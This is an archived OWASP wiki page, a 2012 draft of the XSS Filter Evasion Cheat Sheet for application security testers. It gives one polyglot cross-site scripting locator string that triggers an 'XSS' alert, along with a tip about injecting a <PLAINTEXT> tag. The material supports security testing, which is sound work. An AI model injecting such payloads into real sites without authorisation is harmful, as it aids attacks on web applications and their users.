This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

XSS Filter Evasion Cheat Sheet

From OWASP
Revision as of 20:26, 3 September 2012 by Jmanico (talk | contribs)

Jump to: navigation, search

DRAFT CHEAT SHEET - WORK IN PROGRESS

Introduction

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.

Tests

XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably: 

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

References

http://ha.ckers.org/xss.html

Authors and Primary Editors

RSnake

OWASP Cheat Sheets Project Homepage


V - T - E Cheat Sheets
Developer / Builder
Assessment / Breaker
Mobile
OpSec / Defender
Draft and Beta
All Pages In This Category
Retrieved from "https://wiki.owasp.org/index.php?title=XSS_Filter_Evasion_Cheat_Sheet&oldid=135225"